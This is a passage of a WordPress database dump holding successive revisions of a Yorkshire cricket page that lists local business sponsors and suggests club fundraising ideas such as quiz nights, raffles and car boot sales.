height=\"194\" /></a>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:18:02','2017-07-03 15:18:02','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(50,1,'2017-07-03 15:22:56','2017-07-03 15:22:56','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:22:56','2017-07-03 15:22:56','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(51,1,'2017-07-03 15:24:22','2017-07-03 15:24:22','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in Yorkshire Cricket include:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:24:22','2017-07-03 15:24:22','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(52,1,'2017-07-03 15:27:39','2017-07-03 15:27:39','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in Yorkshire Cricket include:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">Clubs across the country have been looking at ways to increase their financial income and coming up with soome great ideas such as selling merchandise. See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:27:39','2017-07-03 15:27:39','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(53,1,'2017-07-03 15:31:59','2017-07-03 15:31:59','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in Yorkshire Cricket include:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:31:59','2017-07-03 15:31:59','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(54,1,'2017-07-03 15:33:44','2017-07-03 15:33:44','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in Yorkshire Cricket include:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:33:44','2017-07-03 15:33:44','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(55,1,'2017-07-03 15:38:04','2017-07-03 15:38:04','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\">Sponsored Challenge</li>\r\n 	<li style=\"text-align: left;\">Quiz Night</li>\r\n 	<li style=\"text-align: left;\">Raffle</li>\r\n 	<li style=\"text-align: left;\">Summer Fete</li>\r\n 	<li style=\"text-align: left;\">Car boot sale</li>\r\n 	<li style=\"text-align: left;\">Car wash</li>\r\n</ol>\r\n<p style=\"text-align: left;\"></p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:38:04','2017-07-03 15:38:04','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(56,1,'2017-07-03 15:39:40','2017-07-03 15:39:40','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\">Sponsored Challenge</li>\r\n 	<li style=\"text-align: left;\">Quiz Night</li>\r\n 	<li style=\"text-align: left;\">Raffle</li>\r\n 	<li style=\"text-align: left;\">Summer Fete</li>\r\n 	<li style=\"text-align: left;\">Car boot sale</li>\r\n 	<li style=\"text-align: left;\">Car wash</li>\r\n</ol>\r\n&nbsp;\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:39:40','2017-07-03 15:39:40','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(57,1,'2017-07-03 15:43:27','2017-07-03 15:43:27','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\">Sponsored Challenge - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\">Quiz Night - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\">Raffle - always a popular choice</li>\r\n 	<li style=\"text-align: left;\">Summer Fete - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\">Car boot sale - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\">Car wash - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n&nbsp;\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:43:27','2017-07-03 15:43:27','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(58,1,'2017-07-03 15:44:20','2017-07-03 15:44:20','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\">Sponsored Challenge - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\">Quiz Night - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\">Raffle - always a popular choice</li>\r\n 	<li style=\"text-align: left;\">Summer Fete - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\">Car boot sale - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\">Car wash - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for sponsors who keep Cricket going thanks to their generosity. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:44:20','2017-07-03 15:44:20','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(59,1,'2017-07-03 15:45:48','2017-07-03 15:45:48','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer 